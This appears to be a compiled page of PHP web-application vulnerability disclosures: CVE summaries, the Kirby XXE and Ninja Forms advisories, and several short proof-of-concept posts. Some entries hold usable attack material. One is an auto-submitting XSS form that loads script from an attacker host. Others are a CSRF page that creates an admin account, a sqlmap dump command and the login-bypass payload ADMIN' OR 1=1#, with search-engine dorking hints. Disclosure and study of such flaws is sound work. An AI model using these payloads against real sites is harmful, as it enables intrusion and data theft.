A vulnerability, which was classified as critical, was found in phpscriptpoint RecipePoint 1.9. This affects an unknown part of the file /recipe-result. The manipulation of the argument text/category/type/difficulty/cuisine/cooking_method leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-235605 was assigned to this vulnerability.

CVE-2023-3984

A cross-site scripting (XSS) vulnerability in PHPGurukul Online Fire Reporting System Using PHP and MySQL 1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the website title field.

CVE-2023-36942

Atmail 5.62 allows XSS via the mail/parse.php?file=html/$this-%3ELanguage/help/filexp.html&FirstLoad=1&HelpFile=file.html Search Terms field.

Dafydd Stuttard | 29 March 2007 at 18:21 UTC

One good question I was asked in Amsterdam was whether it is possible to exploit a reflected cross-site scripting bug that can only be triggered via a POST request. The answer, of course, is "yes".

There are plenty of delivery mechanisms for reflected XSS attacks, only some of which involve inducing a victim to click on a crafted URL. For example, an attacker can create an innocuous looking web page containing an HTML form with the required fields, and a script which auto-submits the form:

<form name=TheForm action=http://vuln-app/page.jsp method=post>  
<input type=hidden name=foo value=&quot;&gt;&lt;script&#32;src=http://attacker/ bad.js&gt;&lt;/script&gt;>  
</form>  
<script>  
document.TheForm.submit();  
</script>

Rather than creating his own web site, the attacker could of course inject the above attack into a third-party application via a stored XSS bug. The form is submitted cross-domain (as in a cross-site request forgery attack), but the resulting payload executes within the security context of the vulnerable application, enabling the full range of standard XSS attack actions to be performed.

CVE-2022-31200: Exploiting XSS in POST requests

A cross-site scripting (XSS) vulnerability in PHPGurukul Online Fire Reporting System Using PHP and MySQL 1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the team name, leader, and member fields.

CVE-2023-36941

Kirby is a content management system. A vulnerability in versions prior to 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6 only affects Kirby sites that use the `Xml` data handler (e.g. `Data::decode($string, 'xml')`) or the `Xml::parse()` method in site or plugin code. The Kirby core does not use any of the affected methods.

XML External Entities (XXE) is a little used feature in the XML markup language that allows to include data from external files in an XML structure. If the name of the external file can be controlled by an attacker, this becomes a vulnerability that can be abused for various system impacts like the disclosure of internal or confidential data that is stored on the server (arbitrary file disclosure) or to perform network requests on behalf of the server (server-side request forgery, SSRF).

Kirby's `Xml::parse()` method used PHP's `LIBXML_NOENT` constant, which enabled the processing of XML external entities during the parsing operation. The `Xml::parse()` method is used in the `Xml` data handler (e.g. `Data::decode($string, 'xml')`). Both the vulnerable method and the data handler are not used in the Kirby core. However they may be used in site or plugin code, e.g. to parse RSS feeds or other XML files. If those files are of an external origin (e.g. uploaded by a user or retrieved from an external URL), attackers may be able to include an external entity in the XML file that will then be processed in the parsing process. Kirby sites that don't use XML parsing in site or plugin code are *not* affected.

The problem has been patched in Kirby 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and Kirby 3.9.6. In all of the mentioned releases, the maintainers have removed the `LIBXML_NOENT` constant as processing of external entities is out of scope of the parsing logic. This protects all uses of the method against the described vulnerability.

**TL;DR**

This vulnerability only affects Kirby sites that use the Xml data handler (e.g. Data::decode($string, 'xml')) or the Xml::parse() method in site or plugin code. The Kirby core does not use any of the affected methods.

If you use an affected method and cannot rule out XML input controlled by an attacker, we strongly recommend to update to a patch release.

**Introduction**

XML External Entities (XXE) is a little used feature in the XML markup language that allows to include data from external files in an XML structure. If the name of the external file can be controlled by an attacker, this becomes a vulnerability that can be abused for various system impacts like the disclosure of internal or confidential data that is stored on the server (arbitrary file disclosure) or to perform network requests on behalf of the server (server-side request forgery, SSRF).

**Impact**

Kirby's Xml::parse() method used PHP's LIBXML_NOENT constant, which enabled the processing of XML external entities during the parsing operation.

The Xml::parse() method is used in the Xml data handler (e.g. Data::decode($string, 'xml')).

Both the vulnerable method and the data handler are not used in the Kirby core. However they may be used in site or plugin code, e.g. to parse RSS feeds or other XML files. If those files are of an external origin (e.g. uploaded by a user or retrieved from an external URL), attackers may be able to include an external entity in the XML file that will then be processed in the parsing process.

Kirby sites that don't use XML parsing in site or plugin code are _not_ affected.

**Patches**

The problem has been patched in Kirby 3.5.8.3, Kirby 3.6.6.3, Kirby 3.7.5.2, Kirby 3.8.4.1 and Kirby 3.9.6. Please update to one of these or a later version to fix the vulnerability.

In all of the mentioned releases, we have removed the LIBXML_NOENT constant as processing of external entities is out of scope of the parsing logic. This protects all uses of the method against the described vulnerability.

**Credits**

Thanks to Alexandre Zanni (@noraj) at ACCEIS and Patrick Falb (@dapatrese) at FORMER 03 for responsibly reporting the identified issue.

CVE-2023-38490: XML External Entity (XXE) vulnerability in the XML data handler

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Saturday Drive Ninja Forms Contact Form plugin <= 3.6.25 versions.

This blog post is about Ninja Forms plugin vulnerabilities. If you’re a Ninja Forms user, please update the plugin to at least version **3.6.26**.

**Patchstack Developer and Business users are protected from the vulnerability.** You can also sign up for the Patchstack Community plan to be notified about vulnerabilities as soon as they become disclosed.

For plugin developers, we have security audit services and Threat Intelligence Feed API for hosting companies.

**About the Ninja Forms plugin**

The plugin Ninja Forms versions **3.6.25** and below, free version), which has over 900,000 active installations is known as the more popular forms builder plugin in WordPress. This plugin is developed by Saturday Drive.

This plugin is a free form builder plugin for WordPress that enables us to build just about any type of form we could imagine. Ranging from simple contact forms to event registrations, file uploads, payments, and more.

**The security vulnerability**

This plugin suffers from multiple vulnerabilities. The first vulnerability is a POST-based reflected XSS. This vulnerability could allow any unauthenticated user to steal sensitive information to, in this case, privilege escalation on the WordPress site by tricking privileged users to visit the crafted website. The described vulnerability was fixed in version **3.6.26** and assigned **CVE-2023-37979**.

The second and third vulnerabilities are a broken access control on form submissions export feature. This vulnerability allows Subscriber and Contributor role user to export all of the Ninja Forms submissions on a WordPress site. The described vulnerability was also fixed in version **3.6.26** and assigned **CVE-2023-38393** and **CVE-2023-38386**.

**Reflected XSS**

The initial entry-point of this vulnerability exist in the route function:

    public function route()
    {
    	register_shutdown_function( array( $this, 'shutdown' ) );
    
    	$method = strtolower( $_SERVER['REQUEST_METHOD'] );
    
    	/*
    		* Request Method Override
    		* Allows for a POST request to function as another Request Method
    		*   by passing a `method_override` value as a request parameter.
    		* For example, some servers do not support the DELETE request method.
    		*/
    	if( 'post' == $method and isset( $_REQUEST[ 'method_override' ] ) ){
    		$method = sanitize_text_field( $_REQUEST[ 'method_override' ] );
    	}
    
    	if( ! method_exists( $this, $method ) ){
    		$this->_errors[] = esc_html__( 'Endpoint does not exist.', 'ninja-forms' );
    		$this->_respond();
    	}
    	/**
    	 * This call get the $_REQUEST info for the call(post, get, etc.)
    	 * being called.
    	 */
    	$request_data = $this->get_request_data();
    
    	try {
    		$data = $this->$method($request_data);
    		$this->_respond( $data );
    -------------------------- CUT HERE --------------------------

The above route function could be called from an ajax action named nf_batch_process. Notice on the function that we could override the $method using $_REQUEST[ 'method_override' ] parameter if the original HTTP method performed is a POST request. The code then will call this->$method() with $request_data as input parameter. The $request_data value is constructed from get_request_data function :

    protected function get_request_data()
    {
        $request_data = array();
    
        if (isset($_REQUEST['batch_type']) && $_REQUEST['batch_type']) {
            $request_data['batch_type'] = WPN_Helper::sanitize_text_field($_REQUEST['batch_type']);
        }
    
        if (isset($_REQUEST['data']) && $_REQUEST['data']) {
            // @TODO: Find a way to safely sanitize this later.
            // sanitize_text_field overcorrects, breaking "actual" data.
            $request_data['data'] = $_REQUEST['data'];
        }
    
        if (isset($_REQUEST['security']) && $_REQUEST['security']) {
            $request_data['security'] = WPN_Helper::sanitize_text_field($_REQUEST['security']);
        }
    
        if (isset($_REQUEST['action']) && $_REQUEST['action']) {
            $request_data['action'] = WPN_Helper::sanitize_text_field($_REQUEST['action']);
        }
    
        return $request_data;
    }

The interesting part is which function could we call on the $method variable. Turns out that we could call the _respond function itself which originally act as a wrapper function to output data :

    protected function _respond( $data = array() )
    {
        if( empty( $data ) ){
            $data = $this->_data;
        }
    
        if( isset( $this->_data['debug'] ) ) {
            $this->_debug = array_merge( $this->_debug, $this->_data[ 'debug' ] );
        }
    
        if( isset( $this->_data['errors'] ) && $this->_data[ 'errors' ] ) {
            $this->_errors = array_merge( $this->_errors, $this->_data[ 'errors' ] );
        }
    
        // allow for accessing and acting on $data before responding
        do_action( 'ninja_forms_before_response', $data );
    
        $response = array( 'data' => $data, 'errors' => $this->_errors, 'debug' => $this->_debug );
    
        echo wp_json_encode( $response );
    
        wp_die(); // this is required to terminate immediately and return a proper response
    }

Notice that the function will output $response that could be constructed from our $data variable with echo wp_json_encode(). This will still make HTTP response output as text/html. Looking back at the get_request_data function, we could inject the XSS payload via $_REQUEST['data'] since there is no sanitization or escaping implemented.

**Subscriber+ Broken Access Control**

The underlying vulnerability exist in the processing function:

    public function processing() {
    
    	// Get our passed arguments. These come from the querysting of the processing page.
    	if ( isset ( $_REQUEST['args'] ) ) {
    		$this->args = WPN_Helper::sanitize_text_field($_REQUEST['args']);
    		if ( isset ( $this->args['redirect'] ) ) {
    			if( wp_validate_redirect( $this->args['redirect'] ) ){
    				$this->redirect = wp_sanitize_redirect( $this->args['redirect'] );
    			}
    		}
    	} else {
    		$this->args = array();
    	}
    
    	// Get our current step.
    	$this->step = isset ( $_REQUEST['step'] )? esc_html( $_REQUEST['step'] ) : 'loading';
    
    	// Get our total steps
    	$this->total_steps = isset ( $_REQUEST['total_steps'] )? esc_html( $_REQUEST['total_steps'] ) : 0;
    
    	// If our step is loading, then we need to return how many total steps there are along with the next step, which is 1.
    	if ( 'loading' == $this->step ) {
    		$return = $this->loading();
    		if ( ! isset ( $return['step'] ) ) {
    			$saved_step = get_user_option( 'nf_step_processing_' . $this->action . '_step' );
    			if ( ! empty ( $saved_step ) ) {
    				$this->step = $saved_step;
    			} else {
    				$this->step = 1;
    			}
    
    			$return['step'] = $this->step;
    		}
    		if ( ! isset ( $return['complete'] ) ) {
    			$return['complete'] = false;
    		}
    	} else { // We aren't on the loading step, so do our processing.
    		$return = $this->step();
    -------------------------- CUT HERE --------------------------

The processing function is set to be a function handler of nf_download_all_subs ajax action and there is no proper permission check. The function will call $this->step() function which will export all of the submission to the $this->args['filename'] we specified.

**Contributor+ Broken Access Control**

The underlying vulnerability exists in the export_listen function:

    -------------------------- CUT HERE --------------------------
    if (isset ($_REQUEST['download_file']) && !empty($_REQUEST['download_file'])) {
    
        // Open our download all file
        $filename = esc_html($_REQUEST['download_file']);
    
        $upload_dir = wp_upload_dir();
    
        $file_path = trailingslashit($upload_dir['path']) . $filename . '.csv';
    
        if (file_exists($file_path)) {
            $myfile = file_get_contents($file_path);
        } else {
            $redirect = esc_url_raw(remove_query_arg(array('download_file', 'download_all')));
            wp_redirect($redirect);
            die();
        }
    
        unlink($file_path);
    
        $form_name = Ninja_Forms()->form(absint($_REQUEST['form_id']))->get()->get_setting('title');
        $form_name = sanitize_title($form_name);
    
        $today = date('Y-m-d', current_time('timestamp'));
    
        $filename = apply_filters('ninja_forms_download_all_filename', $form_name . '-all-subs-' . $today);
    
        header('Content-type: application/csv');
        header('Content-Disposition: attachment; filename="' . $filename . '.csv"');
        header('Pragma: no-cache');
        header('Expires: 0');
    
        echo $myfile;
    
        die();
    }
    -------------------------- CUT HERE --------------------------

The function is set to be a function handler of load-edit.php hook which could be triggered when a user for example visits the /wp-admin/edit.php endpoint. Since there is no proper permission check, by default, user with minimum role of Contributor could export form submissions.

**The patch**

For the reflected XSS issue, the vendor decide to restrict which method that user could access from the function. With this patch, it is enough to prevent user to directly call the _respond function to trigger the XSS. The patch can be seen below :

For the Subscriber+ broken access control, adding a permission check should also fix the reported issue. The patch can be seen below :

For the Contributor+ broken access control also, adding a permission check should also fix the reported issue. The patch can be seen below :

**Conclusion**

For some cases, plugin or theme code need to call certain function or class from user supplied string. Always try to check and restrict which function or class the user could directly call. Also pay extra attention to an export data action and always implement permission or access control check to the related functions.

**Timeline**

22 June, 2023We found the vulnerability and reached out to the plugin vendor.

04 July, 2023Ninja Forms version **3.6.26** was published to patch the reported issue.

27 July, 2023Security advisory article publicly released.

**Help us make the Internet a safer place**

Making the WordPress ecosystem more secure is a team effort, and we believe that plugin developers and security researchers should work together.

*   If you’re a **plugin developer**, join our mVDP program that makes it easier to report, manage and address vulnerabilities in your software.
*   If you’re a **security researcher**, join Patchstack Alliance to report vulnerabilities & earn rewards.

CVE-2023-37979: Multiple Vulnerabilities in WordPress Ninja Forms Plugin - Patchstack

XLAgenda version 4.4 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : XLAgenda v4.4 CSRF Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://xavier.lequere.net/xlagenda/                                                                               |  | # Dork      : "Propulsé par XLAgenda 4.4"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin.[+] Go to the line 12.[+] Set the target site link Save changes and apply. [+] infected file : /install/install2.php.[+] http://127.0.0.1/xlagenda44/install/install2.php[+] save code as poc.html .<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>XLAgenda 4.4 | Installation</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><link href="style.css" rel="stylesheet" type="text/css" /></head><body><h1>Installation - Etape 2/3</h1><p class="confirmation">Les tables ont été créées avec succès dans votre base de données.</p><form name="form1" method="post" action="http://127.0.0.1/xlagenda44/install/install2.php">  <h3>Choisissez un nom d'utilisateur et un mot de passe d'administration</h3>  <p>    <label for="user">Nom d'utilisateur :</label><br>    <input name="user" type="text" id="user" value="" maxlength="20" size="30" /> *<br>    (20 caractères maximum)  </p>  <p>    <label for="pass">Mot de passe :</label><br>    <input name="pass" type="password" id="pass" maxlength="15" size="30" /> *<br>    (6 à 15 caractères)  </p>  <p>    <label for="pass2">Introduisez à nouveau le mot de passe :</label><br>    <input name="pass2" type="password" id="pass2" maxlength="15" size="30" /> *  </p>  <p>    <label for="nom">Nom :</label><br>    <input name="nom" type="text" id="nom" value="" size="30" />  </p>  <p>    <label for="prenom">Prénom :</label><br>     <input name="prenom" type="text" id="prenom" value="" size="30" />  </p>  <p>    <label for="email">Adresse email :</label><br>    <input name="email" type="text" id="email" value="" size="30" /> *  </p>  <p>    Les champs marqués d'un * sont obligatoires.<br>    Votre adresse email n'appara&icirc;tra pas sur l'agenda mais est nécessaire pour vous permettre de récupérer votre mot de passe si vous l'avez oublié.  </p>  <p style="text-align:center;">   <input type="submit" name="Submit" value="Continuer >>" />  </p></form></body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

XLAgenda 4.4 Cross Site Request Forgery

xForUp Simple File Uploader version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : xForUp simple file uploader V1.0 Sql injection Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://github.com/munafaqeelmahdi/xForUp-simple-file-uploader-with-php                                            |  ====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  http://127.0.0.1/pages.php?page=17 <======| inject here[+]  Panel : http://127.0.0.1/admin/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

xForUp Simple File Uploader 1.0 SQL Injection

B-OBEC version V.092019 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : B-OBEC V.092019 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://bobec.bopp-obec.info/                                                                                      |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /area_user.php?Area_CODE=1001[+] D:\sqlmap>sqlmap.py -u https://target_site/area_user.php?Area_CODE=1001 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbsGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

B-OBEC V.092019 SQL Injection

BMIT BMS version 2.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : BMIT BMS 2.1 Auth BY Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.bmitsolution.in/softtware_development.php                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ADMIN' OR 1=1#[+] http://127.0.0.1/wwrbsgroupofinstitutioncom/admin/index.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#php